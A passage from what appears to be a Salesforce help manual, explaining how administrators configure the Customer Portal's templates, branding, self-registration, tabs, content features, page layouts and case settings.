as Available for Use.

The email template used to send a notification to Customer
Portal users when a public comment is added to one of their

New Comment Template

cases. This template must be marked as Available for
Use.

The email template used to send a notification to Customer
Portal users when they become the new owner of a record

Change Owner to Portal User Template

in the portal. This template must be marked as Available
for Use.

Note: You can standardize the communication templates sent to the users of all your Customer Portals by clicking
the Set Default Email Templates for All Customer Portals link on the Tools section of the Customer Portal
Setup page. For more information, see Creating Multiple Customer Portals on page 1935.

Tip:  If you plan to use the same communication template for different objects, such as the Change Owner to
Portal User Template, we recommend that you include text and merge fields on the template that are appropriate
for both objects. For example, if your organization has a Warranty custom object and a Training custom object,
and you want to use the Change Owner to Portal User Template for both, the text and merge fields on the template
should read: “A new record has been assigned to you. Id: {!Training.ID}{!Warranty.Id}.” When the template is
sent, only the relevant merge fields will display.

Look and Feel

DescriptionSetting

A text or HTML file that allows you to incorporate your
organization’s branding into the header of your Customer

Header

Portal. Click the lookup icon ( ) to choose a file that has
been uploaded to a publicly accessible folder on the
Documents tab.

The files you include in the Header and Footer lookup
fields can have a combined size of up to 10 KB.

We recommend that you do not add a header and a logo to
your portal because they may not display properly together.

1940

Setting Up Your Customer PortalSetting Up Customer Channels



Look and Feel

DescriptionSetting

You can position the logout link anywhere on the header by
using the HTML tag: “<a
href="/secur/logout.jsp">Logout</a>.”

A text or HTML file that allows you to incorporate your
organization’s branding into the footer of your Customer

Footer

Portal. Click the lookup icon ( ) to choose a file that has
been uploaded to a publicly accessible folder on the
Documents tab.

The files you include in the Header and Footer lookup
fields can have a combined size of up to 10 KB.

An image file that allows you to incorporate your
organization's branding into the top left header of your

Logo

Customer Portal. Click the lookup icon ( ) to choose a
file that has been uploaded to a publicly accessible folder on
the Documents tab and marked as an Externally
Available Image.

The file you include in the Logo lookup field can be up to
20 KB.

We recommend that you do not add a header and a logo to
your portal because they may not display properly together.

A text or HTML file that allows you to incorporate your
organization’s branding into the header of the login page,

Login Message

forgot password page, and change password page of your

Customer Portal. Click the lookup icon ( ) to choose a
file that has been uploaded to a publicly accessible folder on
the Documents tab.

The file you include in the Login Message lookup field
can be up to 2 KB.

Note:  JavaScript and CSS code are automatically
removed from HTML files used as the portal login
message.
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Self-Registration Settings

DescriptionSetting

Allows existing contacts to register themselves for access to
your Customer Portal.

When you select this checkbox and add the Allow
Customer Portal Self-Registration checkbox to

Self-Registration Enabled

contact page layouts, contacts whose records are marked
Allow Customer Portal Self-Registration can
view a self-registration area on the Login page of your
Customer Portal. From the self-registration area, users can
enter their email address and click Submit to receive an
automatically assigned username and password for logging
in to your Customer Portal. Other email notifications sent
to users regarding their registration status include:

• Existing user, from which the user can enter another
email address or click a Forgot Password? link to retrieve
his or her password.

• New user, which informs the user that the email address
he or she submitted does not match an existing contact
in your organization. If an administrator has
implemented Web-to-Case or Web-to-Lead to capture
new user information, then the user can click a link to
enter his or her information on the appropriate form.

• Internal error, which informs the user that an error
occurred during the self-registration process and that
your portal's administrator has been notified about the
error.

• Ineligible user, which informs the user that he or she is
not eligible for self-registration to your Customer Portal.
This notification is sent when a submitted email address
matches a contact that does not have the Allow
Customer Portal Self-Registration checkbox
selected. It is also sent when a submitted email address
does not match any contacts, and your administrator has
not set up Web-to-Lead or Web-to-Case to capture new
user information.

Ensure that all required custom fields on users have default
values. Otherwise, users who self-register for your Customer
Portal will receive an error message.

Note that person account users cannot self-register for your
Customer Portal. When person account users self-register
for your Customer Portal, they receive an email notification
that instructs them to contact the portal administrator.
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Self-Registration Settings

DescriptionSetting

Allows you to specify the URL of a Web-to-Lead or
Web-to-Case form for users who self-register for access to
your Customer Portal.

The URL to this form is offered via the template selected
in the Registration Error Template field to

New User Form URL

self-registering users who lack an existing contact record, so
that their information can be captured and converted to a
contact.

The email template sent to users who self-register for your
Customer Portal, but experience a registration error, or need

Registration Error Template

to complete a Web-to-Case or Web-to-Lead form to register
for your portal. By default, a sample template is automatically
selected for you. You can also create your own template or
modify the sample. Be sure to mark the template as
Available for Use.

The From Email Address and From Email Name fields
on Customer Portal settings specify who this template is
sent from.

Click the lookup icon ( ) to choose a default portal user
license for users who self-register for your Customer Portal.

Default New User License

Click the lookup icon ( ) to choose a default portal role
for users who self-register for your Customer Portal.

Default New User Role

Click the lookup icon ( ) to choose a default portal profile
for users who self-register for your Customer Portal.

You cannot delete the profile selected as the default portal
profile.

Default New User Profile

4. Click Save to save your Customer Portal settings.

See Also:
Setting Up Your Customer Portal
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Customizing Your Customer Portal Fonts and Colors

Available in: Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Customize Application”To change the fonts and colors of the Customer Portal:

Note: Starting with Summer ’13, the Customer Portal isn’t available for new organizations. Existing organizations
continue to have access to the Customer Portal. If you don’t have a Customer Portal, but want to easily share
information with your customers, try Communities.

Existing organizations using Customer Portals may continue to use their Customer Portals or transition to
Communities. Contact your Salesforce Account Executive for more information.

You can customize the fonts and colors of the Salesforce Customer Portal to reflect your company’s branding. Your portal’s
fonts and colors are specified in a portal “color theme.” Select a predefined color theme and, optionally, customize it to better
match your branding. You can click the See examples link to see all of the theme attributes you can customize.

1. From Setup, click Customize > Customer Portal > Settings.
2. Select the name of your Customer Portal.
3. Click Change Portal Fonts and Colors.
4. Select a color theme from the Color Theme drop-down list. Select Custom from the Color Theme drop-down list to

create your own theme from scratch. A preview of the color theme you select is automatically displayed in the Preview
sections.

5. Optionally, customize the color of any theme you select by either:

• Entering a hexadecimal value into any theme attribute, or
• Clicking the hexadecimal value of any theme attribute and selecting a color from the point-and-click editor

When you customize a theme, it is automatically renamed Custom when saved. You can customize the following options,
which, when customized, automatically display in the Preview sections:

Tab Styles

DescriptionTheme Attribute

Text color of the tab users have selected.Current Tab Text

Background color of the tab users have selected.Current Tab Background

Border color of the tab users have selected.Current Tab Border

Text color of the tabs users have not selected.Other Tab Text

Background color of the tabs users have not selected.Other Tab Background

Border color of the tabs users have not selected.Other Tab Border

Background color behind all tabs.Tab Bar Background
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Page Styles

DescriptionTheme Attribute

Portal background color, excluding search, related lists,
recent items, solution categories, document folders, and the
Create New drop-down list.

Page Background

Text color, size, and font on all portal items, except for tabs,
buttons, headers, and field labels.

Optionally, you can change the number in the percent field
to increase or decrease the size of all portal items.

Text

Additionally, you can change the font of all portal items,
except for tabs, buttons, headers, and field labels from the
drop-down list.

Text color of the field names on records.

Optionally, you can change the font of the text from the
drop-down list.

Field Label Text

Text color of all links.Link

Text color of all links when a user hovers the mouse over
them.

Link Hover

Color of the lines that separate fields on records.Field Separator

Color of the line bordering the bottom of the portal.Bottom Border

Section Styles

DescriptionTheme Attribute

Background color of all headings, including search, recent
items, related lists, solution categories, documents folders,
and the selected tab.

Header Background

Text color and font on the headers of search, related lists,
recent items, solution categories, and document folders.

Optionally, you can change the font of the text from the
drop-down list.

Section Header Text

Border to the left of search, related lists, recent items,
solution categories, document folders, and the Create New
drop-down list.

Optionally, you can change the number in the pixel field to
increase or decrease the thickness of the border. Additionally,

Left Border

you can select the style of the line displayed for the border
from the drop-down list.
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Section Styles

DescriptionTheme Attribute

Border to the right of search, related lists, recent items,
solution categories, document folders, and the Create New
drop-down list.

Optionally, you can change the number in the pixel field to
increase or decrease the thickness of the border. Additionally,

Right Border

you can select the style of the line displayed for the border
from the drop-down list.

Border above search, related lists, recent items, solution
categories, document folders, and the Create New
drop-down list.

Optionally, you can change the number in the pixel field to
increase or decrease the thickness of the border. Additionally,

Top Border

you can select the style of the line displayed for the border
from the drop-down list.

Border underneath search, related lists, recent items, solution
categories, document folders, and the Create New
drop-down list.

Optionally, you can change the number in the pixel field to
increase or decrease the thickness of the border. Additionally,

Bottom Border

you can select the style of the line displayed for the border
from the drop-down list.

Background color of search, related lists, recent items,
solution categories, document folders, and the Create New
drop-down list.

Section Background

List Styles

DescriptionTheme Attribute

Text color of the field names selected as column headings
on list views.

Optionally, you can change the font of the text from the
drop-down list.

List Header Text

Color of the lines underneath column headings on related
lists and list views.

Header Underline

Color of the lines between records on list views.Separator

Color of a record when a user hovers the mouse over it on
list views.

Row Highlight
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6. Click Save to save all changes to the theme values.

Tip: Changes are visible to Customer Portal users when they refresh their browsers. Therefore, we recommend
updating your portal color theme at times when users are least likely to visit your Customer Portal.

Note:  To customize the header, footer, and logo of your Customer Portal, see Enabling Customer Portal Login and
Settings on page 1937.

See Also:
Setting Up Your Customer Portal
Customizing Your Customer Portal Tabs

Customizing Your Customer Portal Tabs

Available in: Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Customize Application”To customize Customer Portal tabs:

Note: Starting with Summer ’13, the Customer Portal isn’t available for new organizations. Existing organizations
continue to have access to the Customer Portal. If you don’t have a Customer Portal, but want to easily share
information with your customers, try Communities.

Existing organizations using Customer Portals may continue to use their Customer Portals or transition to
Communities. Contact your Salesforce Account Executive for more information.

The Salesforce Customer Portal can display the following tabs:

• Answers

• Articles

• Ideas

• Home

• Cases

• Reports

• Solutions

• Web tabs

• Entitlements

• Custom objects

• Service contracts

• Chatter Answers
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• Documents from the Documents tab

• Salesforce CRM Content tabs: Libraries, Content, and Subscriptions

Additionally, the Customer Portal can display the following tabs to delegated external user administrators:

• Accounts

• Contacts

To choose which tabs display to users logged in to a Customer Portal, and to customize the order in which tabs display to
portal users:

1. From Setup, click Customize > Customer Portal > Settings.
2. Select the name of the Customer Portal whose tabs you want to customize.
3. Click Customize Portal Tabs.
4. To add or remove tabs, select a tab title, and click the Add or Remove arrow to add or remove the tab to or from the

Selected Tabs box. To change the order of the tabs, select a tab title in the Selected Tabs box, and click the Up or Down
arrow.

5. Optionally, from the Default Landing Tab drop-down, you can select which tab to display to users when they log
into your portal.

6. Click Save.

You can further specify which tabs users can access by editing tab settings in users’ associated profiles and permission sets.

Tip:  You can create multiple Customer Portals that display different tabs for users with the same profile, as long as
they have access to each object displayed on a tab.

To make the following tabs visible in the Customer Portal, use the steps above and change the tab visibility setting to Default
On in all Customer Portal profiles.

Allowing Portal Users to View Web Tabs

To allow portal users to view Web tabs, simply create Web tabs and assign them to Customer Portal profiles.

Granting Portal Users Access to the Documents Tab

To allow portal users to view a Documents tab, grant Customer Portal users access to the folders on your Salesforce Documents
tab that contain the files you want them to view.

Allowing Portal Users to View the Reports Tab

To allow portal users to view a Reports tab:

1. Grant portal users access to the folders on your Salesforce Reports tab that contain the reports you want them to run.
2. Set the organization-wide default sharing model to Private on objects you want portal users to report on.
3. Assign portal users to permission sets or profiles that include the “Run Reports” permission.

When you add the Reports tab to your Customer Portal, portal users:

• Cannot customize reports or filter report results; they can only run reports.
• Can export reports to Excel if they have the “Export Reports” permission.
• Do not have access to the Unfiled Public Reports and My Personal Custom Reports folders.
• Will receive an insufficient privileges error if they run a report that contains objects they do not have permission to view.
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Providing Portal Users with Access to the Ideas Tab

To allow portal users to access the Ideas tab, configure Ideas to display in the portal. For more information, see Creating and
Editing Zones on page 2021 and Enabling Ideas in the Customer Portal on page 1951.

If your organization has the Ideas and Answers Portal license, hide the Reports tab in the Customer Portal. Otherwise, your
Customer Portal users receive an Insufficient Privileges message when they click the Reports tab. For information on hiding
tabs, see Customizing Your Customer Portal Tabs on page 1947.

Allowing Portal Users to Access Salesforce CRM Content Tabs

To allow portal users to access Salesforce CRM Content, see Enabling Salesforce CRM Content in the Customer Portal on
page 1949.

See Also:
Setting Up Your Customer Portal
Administrator setup guide: Salesforce Customer Portal Implementation Guide

Enabling Salesforce CRM Content in the Customer Portal

Available in: Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Customize Application”To set up and update the Customer Portal:

“Manage Users”To create and edit profiles:

“Edit Self-Service Users”To manage Customer Portal users:

“Manage Salesforce CRM Content” OR

“Manage Content Permissions”

To create Salesforce CRM Content library permissions:

“Manage Salesforce CRM Content”

OR

Manage Library checked in your library permission
definition

To add users to a Salesforce CRM Content library:

Note: Starting with Summer ’13, the Customer Portal isn’t available for new organizations. Existing organizations
continue to have access to the Customer Portal. If you don’t have a Customer Portal, but want to easily share
information with your customers, try Communities.

Existing organizations using Customer Portals may continue to use their Customer Portals or transition to
Communities. Contact your Salesforce Account Executive for more information.

Salesforce CRM Content is available in the Customer Portal. Two levels of access to Salesforce CRM Content can be granted
to Customer Portal users:
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• Portal users without a Salesforce CRM Content feature license can download, rate, comment on, and subscribe to content
if they have the “View Content on Portals” user permission. They cannot view potentially sensitive data such as usernames
and download, version, and subscriber history. The content delivery feature is not available to portal users.

• Portal users with a Salesforce CRM Content feature license can access all Salesforce CRM Content features granted by
their library permission(s), including contributing content, moving and sharing content among libraries, and deleting
content. They can also view Salesforce CRM Content reports. The content delivery feature is not available to portal users.

Enabling Salesforce CRM Content for Non-Licensed Users

After you have enabled your Customer Portal, complete the following steps to enable Salesforce CRM Content in your portals.
Use these steps if you have not purchased Salesforce CRM Content feature licenses for your portal users.

1. Update Customer Portal profiles:

a. Clone the Customer Portal User or Customer Portal Manager profile.
b. In the cloned profiles, add the “View Content in Portals” user permission.
c. Change the tab visibility for the Libraries, Content, and Subscriptions tabs from Tab Hidden to Default On.
d. Assign the cloned profiles to your Customer Portal users.

2. Determine what privileges your portal users will have in each Salesforce CRM Content library by creating one or more
library permissions.

Note:  A library permission can only grant privileges that a user's feature license or profile permits. For example,
even though Tag Content is a library permission option, selecting it does not allow portal users without a
Salesforce CRM Content feature license to tag content.

3. Determine which libraries you want your portal users to have access to. Ensure that confidential content is not available
in these libraries.

4. Add portal users to libraries. Portal users with the Customer Portal User profile or a clone of that profile can only be added
to a library as part of a public group. Portal users with the Customer Portal Manager profile or a clone of that profile can
be added to a library individually.

5. Add the Salesforce CRM Content tabs to each Customer Portal.

Note:  The Documents tab is not part of Salesforce CRM Content.

Enabling Salesforce CRM Content for Licensed Users

After you have enabled your Customer Portal, complete the following steps to enable Salesforce CRM Content in your portals.
Use these steps if you have purchased Salesforce CRM Content feature licenses for your portal users

1. Update Customer Portal profiles:

a. Optionally, clone the Customer Portal User and Customer Portal Manager profile to include the “Create Libraries”
user permission if you want to allow portal users to create and administer new libraries.

b. In your standard or cloned Customer Portal profiles, change the tab visibility for the Libraries, Content, and Subscriptions
tabs from Tab Hidden to Default On.

c. Assign the cloned profiles to your Customer Portal users as needed.

2. Select the Salesforce CRM Content User checkbox on the user detail page for each Customer Portal user.
3. Determine what privileges your portal users will have in each Salesforce CRM Content library by creating one or more

library permissions.
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Note:  A library permission can only grant privileges that a user's feature license or profile permits. For example,
even though Tag Content is a library permission option, selecting it does not allow portal users without a
Salesforce CRM Content feature license to tag content.

4. Determine which libraries you want your portal users to have access to. Ensure that confidential content is not available
in these libraries.

5. Add portal users to libraries. Portal users with the Customer Portal User profile or a clone of that profile can only be added
to a library as part of a public group. Portal users with the Customer Portal Manager profile or a clone of that profile can
be added to a library individually.

6. Add the Salesforce CRM Content tabs to each Customer Portal.

Note:  The Documents tab is not part of Salesforce CRM Content.

See Also:
Setting Up Your Customer Portal

Enabling Ideas in the Customer Portal

Available in: Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Customize Application”To set up and update the Customer Portal:

“Manage Users”To create and edit profiles:

“Customize Application”To customize Ideas:

Note: Starting with Summer ’13, the Customer Portal isn’t available for new organizations. Existing organizations
continue to have access to the Customer Portal. If you don’t have a Customer Portal, but want to easily share
information with your customers, try Communities.

Existing organizations using Customer Portals may continue to use their Customer Portals or transition to
Communities. Contact your Salesforce Account Executive for more information.

Ideas is available in the Customer Portal.

After you have set up your Customer Portal, follow the steps below to enable Ideas in your portal.

1. Create zones in the Ideas context that are active and configured to display in the portal. For more information, see Creating
and Editing Zones on page 2021.

2. Add the Ideas tab to your Customer Portal. For more information, see Customizing Your Customer Portal Tabs on page
1947.
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3. If your organization has the Ideas and Answers Portal license, hide the Reports tab in the Customer Portal. Otherwise,
your Customer Portal users receive an Insufficient Privileges message when they click the Reports tab. For information
on hiding tabs, see Customizing Your Customer Portal Tabs on page 1947.

See Also:
Setting Up Your Customer Portal

Enabling Entitlement Management in the Customer Portal

Available in: Enterprise, Unlimited, and Developer Editions with the Service Cloud

User Permissions Needed

"Customize Application"To set up and update the Customer Portal:

"Manage Users"To create and edit profiles:

"Edit Self-Service Users"To manage Customer Portal users:

Note: Starting with Summer ’13, the Customer Portal isn’t available for new organizations. Existing organizations
continue to have access to the Customer Portal. If you don’t have a Customer Portal, but want to easily share
information with your customers, try Communities.

Existing organizations using Customer Portals may continue to use their Customer Portals or transition to
Communities. Contact your Salesforce Account Executive for more information.

You can use the Customer Portal to provide your customers with access to their entitlements and service contracts. Contract
line items don't display in the Customer Portal.

After you have set up entitlement management and enabled a Customer Portal, complete the following steps to add entitlement
management to your portals.

1. Update Customer Portal profiles:

a. Clone Customer Portal profiles and enable the “Read” permission on entitlements or service contracts.
b. Optionally, on the profiles of delegated external user administrators, enable the “Create” and “Delete” permissions on

entitlement contacts. This lets delegated external user administrators update entitlement contacts.
c. In the cloned profiles, verify that the tab visibility for the Entitlements or Service Contracts tabs are Default On.

2. At the bottom of the customer portal detail page, click Edit Profiles and activate the new profiles.
3. Customize case page layouts to add the Entitlement Name lookup field. This lets portal users add entitlements to cases.

Tip: Don't add the following entitlement process fields to case page layouts for portal users because portal users
shouldn't access information related to your internal support processes: Entitlement Process Start Time,
Entitlement Process End Time, Stopped, and Stopped Since.

4. Optionally, customize related lists on accounts and contacts to add Entitlements. This lets delegated external user
administrators create cases automatically associated with the right entitlements.
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5. Add the Entitlements or Service Contract tabs to each Customer Portal.
6. Assign the cloned profiles to your Customer Portal users:

a. To create a new Customer Portal user, click Manage External User and choose Enable Customer User on the contact
detail page. To update an existing user, click Manage External User and choose View Customer User.

b. For a new user, select the cloned profile from the Profile drop-down menu. For an existing user, click Edit  and then
select the profile.

c. Click Save.

See Also:
Setting Up Your Customer Portal

Enabling Salesforce Knowledge in the Customer Portal

Salesforce Knowledge is available for an additional cost in: Enterprise, Unlimited, and Developer Editions.

User Permissions Needed

“Customize Application”To set up and update the Customer Portal:

“Manage Users”To create and edit profiles:

“Edit Self-Service Users”To manage Customer Portal users:

“Read” on the article's article typeTo view Salesforce Knowledge articles:

Note: Starting with Summer ’13, the Customer Portal isn’t available for new organizations. Existing organizations
continue to have access to the Customer Portal. If you don’t have a Customer Portal, but want to easily share
information with your customers, try Communities.

Existing organizations using Customer Portals may continue to use their Customer Portals or transition to
Communities. Contact your Salesforce Account Executive for more information.

You can use the Customer Portal to provide your customers with access to Salesforce Knowledge articles. Portal users can
view and rate articles but cannot create or edit articles.

After you have set up Salesforce Knowledge in your organization and enabled your Customer Portal, complete the following
steps to enable Salesforce Knowledge in your portals.

1. Update Customer Portal profiles:

a. Clone the Customer Portal User or Customer Portal Manager profiles and enable the “Read” permission for article
types you want to share with customers.

b. In the cloned profiles, verify that the tab visibility for the Articles tab is Default On.

2. At the bottom of the customer portal detail page, click Edit Profiles and activate the new profile.
3. Assign the cloned profiles to your Customer Portal users:
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a. To create a new Customer Portal user, click Manage External User and choose Enable Customer User on the contact
detail page. To update an existing user, click Manage External User and choose View Customer User on the contact
detail page.

b. For a new user, select the cloned profile from the Profile drop-down menu. For an existing user, click Edit  and then
select the profile.

c. Click Save.

4. Add the Articles tab to each Customer Portal.
5. If you want your Customer Portal users to have different category group visibility settings than the account owner, change

the visibility settings for the Customer Portal user.

By default, Customer Portal users inherit their data category access from the account owner. For example, if the account
owner has a role of CEO and the CEO role has full access to all the data categories in a category group, then Customer
Portal users can also access all categories in that group. In some cases, you may want to limit which categories a Customer
Portal user can access.

6. If you have high-volume portal users, make the categories these users need to access visible by default. Because high-volume
portal users don't have roles, they can only access categorized articles if the associated data categories have been made
visible to all users regardless of role.

7. Notify users who create articles that they must select Customer Portal as a channel option when creating or modifying an
article. If the Customer Portal channel is not selected, the article will not be published in the portal.

8. To allow users to search for articles from the Home tab, add the Article Search component to the home page layout. Ensure
that you assign the layout to the Customer Portal profiles.

See Also:
Setting Up Your Customer Portal

Enabling Answers in the Customer Portal

Available in: Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Customize Application”To set up and update the Customer Portal:

“Manage Users”To create and edit profiles:

“Customize Application”To create an answers community:

Note: Starting with Summer ’13, the Customer Portal isn’t available for new organizations. Existing organizations
continue to have access to the Customer Portal. If you don’t have a Customer Portal, but want to easily share
information with your customers, try Communities.

Existing organizations using Customer Portals may continue to use their Customer Portals or transition to
Communities. Contact your Salesforce Account Executive for more information.

You can use the Customer Portal to provide your customers with access to an answers community.
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To enable answers in your portal:

1. Set up your Customer Portal.

When customizing your portal fonts and colors, note that answers only supports the following changes:

• All tab styles
• The following page styles:

◊ Page Background
◊ Text
◊ Link
◊ Link Hover

2. Set up answers, making sure that your answers community is configured to display in the Customer Portal.
3. Add the Answers tab to your Customer Portal.
4. Create Customer Portal users:

a. On the contact detail page, click Manage External User and then choose Enable Customer User.
b. Enter the required information, making sure to select the correct Customer Portal profile from the Profile drop-down

menu.
c. Click Save.

5. If you want your Customer Portal users to have different category group visibility settings than the account owner, change
the visibility settings for the Customer Portal user.

By default, Customer Portal users inherit their category access from the account owner. For example, if the account owner
has a role of CEO and the CEO role has full access to all the data categories in the category group assigned to answers,
then Customer Portal users can also access all categories in the answers community. In some cases, you may want to limit
which categories a Customer Portal user can access.

6. If you have high-volume portal users, make the data categories these users need to access visible through permission sets
or profiles.

7. If your organization has the Ideas and Answers Portal license, hide the Reports tab in the Customer Portal. Otherwise,
your Customer Portal users receive an Insufficient Privileges message when they click the Reports tab. For information
on hiding tabs, see Customizing Your Customer Portal Tabs on page 1947.

See Also:
Setting Up Your Customer Portal
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Customizing Your Customer Portal Pages

Available in: Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Customize Application”To modify page layouts:

“Manage Users”To assign page layouts to profiles:

Note: Starting with Summer ’13, the Customer Portal isn’t available for new organizations. Existing organizations
continue to have access to the Customer Portal. If you don’t have a Customer Portal, but want to easily share
information with your customers, try Communities.

Existing organizations using Customer Portals may continue to use their Customer Portals or transition to
Communities. Contact your Salesforce Account Executive for more information.

You can customize your Salesforce Customer Portal pages just as you customize pages in Salesforce: with page layouts.

Page layouts control the layout and organization of buttons, fields, s-controls, Visualforce, custom links, and related lists. They
also help determine which fields are visible, read only, and required. Page layouts can include s-controls and Visualforce pages
that are rendered within a field section when the page displays. You can control the size of the s-controls and Visualforce
pages, and determine whether or not a label and scroll bars display.

Customer Portal users view the layouts assigned to their profile when they log in to your Customer Portal. You can customize
the following objects' page layouts for your portal:

• Home

• Tasks

• Events

• Cases

• Assets

• Accounts

• Solutions

• Contacts

• Entitlements

• Custom Objects

• Service Contracts

Customizing Portal Page Layouts

To work with page layouts, from Setup, click Customize, click the appropriate record type, and select Page Layouts.

By default, Customer Portal users have “Read” permissions on accounts, contacts, assets, products and price books, so that
they can view their account name and choose a contact and asset for the cases they create on your portal. They may also have
“Update” or “Create” permissions for assets and accounts, depending on the type of customer portal.
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Note: Customer Portal users can't view the tags section of a page, even if it is included in a page layout.

To work with page layouts for custom objects, from Setup, click Create > Objects, select a custom object, and choose a page
layout from the Page Layouts section.

To display a custom object in your Customer Portal, you must:

• Select the Available for Customer Portal checkbox on the custom object. You cannot assign a portal profile to
a custom-object page layout unless this checkbox is selected.

• Grant user permissions to the custom object on permission sets or profiles assigned to portal users.
• Add the tab of the custom object to your Customer Portal so that the tab is accessible to your Customer Portal users. For

more information, see Customizing Your Customer Portal Tabs on page 1947.

See Also:
Customizing Your Customer Portal Fonts and Colors
Enabling Customer Portal Login and Settings
Setup Tips and Considerations for Customer Portal Pages

Configuring Multilingual HTML Messages for Customer Portals

Available in: Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Customize Application”To configure languages in portals:

Note: Starting with Summer ’13, the Customer Portal isn’t available for new organizations. Existing organizations
continue to have access to the Customer Portal. If you don’t have a Customer Portal, but want to easily share
information with your customers, try Communities.

Existing organizations using Customer Portals may continue to use their Customer Portals or transition to
Communities. Contact your Salesforce Account Executive for more information.

If your organization has multiple languages enabled, you can upload HTML messages in any of the languages supported by
Salesforce and configure the messages to display in the portal based on portal user language settings. For example, you can
upload an HTML message in French to display on the Home tab for portal users with French language settings, and an
HTML message in English to display on the Home tab for portal users with English language settings.

Note the following before configuring multilingual HTML messages:

• Before you can add a multilingual HTML message to a portal, you must upload the HTML-formatted file in the Documents
tab.

• Even if configured, portal HTML messages will not display on the Ideas, Reports, Content, or Solutions tabs.

To configure multilingual HTML messages:
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1. To configure a display language for the Customer Portal, from Setup, click Customize > Customer Portal > Settings.
2. Click the name of the portal to edit.
3. Click Add New Language in the Assigned Languages related list.
4. Select a language from the Language drop-down list.

5. Click the lookup icon ( ) next to a tab name, then select the HTML message to display on that tab. Optionally repeat
this step for each tab that you want to display an HTML message.

6. Click Save.

Setup Tips and Considerations for Customer Portal Pages

Available in: Enterprise, Unlimited, and Developer Editions

Note: Starting with Summer ’13, the Customer Portal isn’t available for new organizations. Existing organizations
continue to have access to the Customer Portal. If you don’t have a Customer Portal, but want to easily share
information with your customers, try Communities.

Existing organizations using Customer Portals may continue to use their Customer Portals or transition to
Communities. Contact your Salesforce Account Executive for more information.

Consider the following set up tips and general information about Salesforce Customer Portal pages.

Setting Up Cases

• When setting up your Customer Portal, clone the page layout for cases (Case Layout), and rename it Portal Case
Layout. This allows you to easily differentiate between case page layouts for internal users and case page layouts
for portal users.

• By default, new cases are accessible in the Customer Portal, but you can include the Visible in Self-Service
checkbox on case page layouts so that you can deselect the checkbox to prevent a case from being displayed.

• Do not select the Show Case Email Notification and Show Case Email Notification by default
checkboxes on case page layouts. These features only apply to Salesforce users.

• Do not add the Internal Comments field to case page layouts assigned to portal profiles because portal users may
view comments intended only for Salesforce users.

• Include the Asset field on case page layouts if you want portal users to be able to associate cases with an asset related
to their account.

• Include the Contact Name lookup field on case page layouts so that users with “Edit” permissions on that field can
change a case's contact to another portal user in the same account.

• If a portal user is the owner of a case, the Contact Name field on the case must be the contact associated with the
same portal user who owns the case. You can't specify a different contact, even if they’re associated with the same
portal account.

• Do not select the Show solution information section, Show Contact Notification checkbox,
and Select Contact Notification checkbox by default checkboxes on close-case page layouts because
their functions only apply to Salesforce users.

• Create case record types to set the default value of the Case Origin picklist field for cases logged on your Customer
Portal.
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• For case assignment rules to work on the Customer Portal, select the Show Case Assignment checkbox and
Select Case Assignment checkbox by default checkboxes on case page layouts assigned to portal profiles.
Portal users cannot view these checkboxes on the Customer Portal. Note that assignment rules trigger when a case
is created and when it is edited. To prevent cases from being automatically reassigned when edited by portal users,
add a rule entry using the criteria Current User: User Type contains Customer Portal and select
the Do Not Reassign User checkbox.

• Portal users can view all the values in the Type, Status, Priority, and Case Reason picklist fields unless you
create record types for cases that contain separate picklist values for them.

• You can prevent portal users from submitting cases with attachments by removing the Submit & Add Attachment
button from case page layouts:

1. Edit a case page layout with the enhanced page layout editor.
2. Click Layout Properties.
3. Deselect Show Submit & Add Attachment Button.
4. Click OK.
5. Click Save.

Cases

• Portal users need the “Read” permission on contacts to create cases.

• Portal users cannot edit the value of the Status picklist field on cases.

• Portal users can edit and delete attachments they have added to their cases, but portal users cannot edit and delete
attachments added to cases by Salesforce users.

• The Delete and Sharing buttons on case detail pages are not available to portal users.

• The Email Message List, Next, and Previous links are not available to Customer Portal users when they view emails
from the Email related list on case detail pages. The Email related list is only available in organizations where
Email-to-Case or On-Demand Email-to-Case is enabled.

• Optionally, you can create case auto-response rules to automatically respond to portal users when they create a case
on your portal.

• Portal users can view, search, and create notes and attachments on cases.

• When creating a case, a portal user bypasses the Suggested Solutions page and is directed to their case if:

◊ No relevant suggested solutions match the case.

◊ He or she creates the case by clicking Submit & Add Attachment.

Note that suggested solutions are only available in organizations where they are enabled. For more information on
suggested solutions, see Suggested Solutions Overview on page 2296. For more information about how Customer
Portal users can self-close their own cases from suggested solutions, see Enabling Customer Portal Login and Settings
on page 1937.

• If Salesforce Knowledge is enabled, you can add the Articles related list to case page layouts assigned to portal users
so that they can find articles that help them solve their cases.

• If Chatter is enabled for your organization, feed attachments are included in the Notes and Attachments related list.
Portal users can download feed attachments, but can’t preview, edit, or delete them.

Solutions

• The Status picklist field on solutions is not available to portal users.
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• The Status picklist field on a solution does not need to be set to Reviewed for a solution to be visible in the Customer
Portal; a solution is visible in the Customer Portal if the Visible in Self-Service Portal checkbox is selected
on a solution.

• If you enable solution categories for your organization, solution categories are also available in your Customer Portal.
Uncategorized solutions do not display in the solution categories of your Customer Portal, but they do display in
your portal's search and list views.

• The top solutions feature is not available for your Customer Portal, but you can create links on your Customer Portal
home page to your organization's most relevant solutions.

Home Page

• Include the Customer Portal Welcome component on home page layouts assigned to Customer Portal users. Each
Customer Portal user who logs in to your portal receives a welcome message with his or her name. The users can
also change their own portal username, password, locale, language, time zone, and contact information. When portal
users change information about themselves their user records are updated but their contact records aren’t automatically
updated with those changes.

Note that Customer Portal users who have the “Is Single Sign-On Enabled” permission cannot change their usernames
from the Customer Portal Welcome component.

• When designing home page layouts for your Customer Portal, we recommend adding the following components:
Search, Solution Search, Recent Items, Customer Portal Welcome, and a custom HTML Area component that
includes your corporate branding in the wide column.

• Create custom components to put on the home page layouts of your Customer Portal, such as links to custom list
views, specific documents, and top solutions.

• Custom component names do not display in the wide section of the home page in the Customer Portal.

• You can position the logout link anywhere on the header by using the HTML tag: “<a
href="/secur/logout.jsp">Logout</a>.” For more information on the header, see Enabling Customer
Portal Login and Settings on page 1937.

• We recommend not adding the following components to your Customer Portal home page layouts because they are
for Salesforce users: Tasks, Calendar, Product Search, Recent Items, Dashboard Snapshot, Messages
& Alerts, and Items To Approve.

Activities

• Portal users can’t be assigned to activities.

• Portal users can view completed tasks and past events marked Visible in Self-Service that are associated
with objects they have permission to view.

Documents

Verify that none of your organization's internal documents on the Documents tab are available in folders accessible to
portal users.

Reports

